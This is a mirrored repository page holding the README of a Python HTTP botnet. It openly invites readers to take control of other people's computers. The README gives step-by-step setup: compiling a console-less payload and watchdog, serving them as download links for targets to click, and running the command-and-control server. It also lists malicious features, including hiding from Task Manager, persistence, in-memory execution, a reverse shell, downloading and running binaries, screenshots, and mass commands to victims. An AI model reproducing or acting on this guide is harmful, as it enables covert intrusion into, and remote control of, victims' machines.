Giter Club home page Giter Club logo

botnet's Introduction

Drakaina-Botnet

A HTTP botnet with the main core features with more to come, completely made in python. Take control of anyone's computer like it's non of your buisness, because it is not.

Instructions:

  1. Make sure all files are in the same folder.

  2. create a folder called static, and in that folder create a folder called windows.

  3. compile payload.py, and watchdog.py with "Nuitka" using the command " python -m nuitka --onefile --disable-console script.py"

  4. place both compiled files in the Windows folder you created ealiar, these files will be automatically downloaded to your target when they click the link.

  5. open server_config.cfg and change the server and port to what you want the server to run on.

  6. run server.py using " python server.py " or " python3 server.py " from the commandline.

  7. test by downloading the Watchdog file from the link "http://:/downloads/windows/watchdog"

  8. you should see requests comming in to your server...enjoy

Watchdog:

  • Features:

  • Auto-start

  • Keeps payload alive.

  • Hide from Taskmanager.

  • Hide from startup.

  • Kill payload until Taskmanager is closed.

  • Run Payload in memory (no file touches disk).

Payload:

  • Features:

  • Supports Multiple Commands

  • connects to reverse shell

  • downloads and runs binaries

  • Virtual-Machine Detection ( testing )

  • register to database

C&C terminal:

/list = show registered users

/use = select a target

/create link = create a 1 time dynamic link to gather information ( incomplete ), link will stop working after it is clicked.

/help = show this.

Server:

  • Features:

  • Checks if user is registered

  • Register users

  • Automatic download link's to binary files

  • downloads screenshots from payload

  • send mass command to all users

  • HTML GUI ( incomplete )

botnet's People

Contributors

h0lyl337 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.